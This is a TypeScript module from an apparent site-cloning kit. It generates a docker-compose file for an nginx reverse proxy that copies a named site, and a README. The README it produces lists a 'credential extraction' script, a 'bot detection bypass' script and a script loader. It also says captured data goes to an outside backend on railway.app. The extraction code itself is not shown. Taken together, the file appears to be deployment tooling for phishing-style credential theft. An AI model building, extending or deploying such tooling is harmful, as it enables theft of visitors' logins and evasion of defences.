/**
 * DOCKER GENERATOR - Phase 3
 *
 * Generates docker-compose.yml for each clone
 */

export interface DockerConfig {
  siteName: string
  nginxConfPath: string
  port: number
  imageName?: string
  version?: string
}

export class DockerGenerator {
  private config: DockerConfig

  constructor(config: DockerConfig) {
    this.config = {
      imageName: 'nginx:alpine',
      version: '1.0',
      port: 8080,
      ...config,
    }
  }

  generate(): string {
    const { siteName, nginxConfPath, port, imageName } = this.config

    return `version: '3.8'

services:
  legion-proxy:
    image: ${imageName}
    container_name: legion-${siteName}
    ports:
      - "${port}:80"
    volumes:
      - ${nginxConfPath}:/etc/nginx/nginx.conf:ro
      - ./cache:/var/cache/nginx
      - ./logs:/var/log/nginx
    environment:
      - TZ=UTC
    restart: unless-stopped
    networks:
      - legion-network
    healthcheck:
      test: ["CMD", "wget", "--quiet", "--tries=1", "--spider", "http://localhost/health"]
      interval: 30s
      timeout: 10s
      retries: 3
      start_period: 10s

networks:
  legion-network:
    driver: bridge

volumes:
  cache:
  logs:
`
  }

  generateReadme(): string {
    const { siteName, port } = this.config

    return `# Legion Clone - ${siteName.toUpperCase()}

## Quick Start

\`\`\`bash
# Start the clone
docker compose up -d

# Check logs
docker compose logs -f

# Stop
docker compose down
\`\`\`

## Access

Open: http://localhost:${port}

## Files

- \`nginx.conf\` - Reverse proxy configuration
- \`legion-authorized-drain.js\` - Credential extraction
- \`legion-loader.js\` - Script loader
- \`legion-cloak-client.js\` - Bot detection bypass
- \`legion-statsig-mock.js\` - Feature flag mock

## Troubleshooting

\`\`\`bash
# Check container status
docker ps

# View nginx errors
docker compose logs

# Rebuild
docker compose down && docker compose up
\`\`\`

## Backend

Configured to send data to: https://legionapi-production.up.railway.app

---
*Generated by Legion Clone Perfect Engine*
`
  }
}

export async function generateDocker(config: DockerConfig): Promise<string> {
  const generator = new DockerGenerator(config)
  return generator.generate()
}

export async function generateReadme(config: DockerConfig): Promise<string> {
  const generator = new DockerGenerator(config)
  return generator.generateReadme()
}
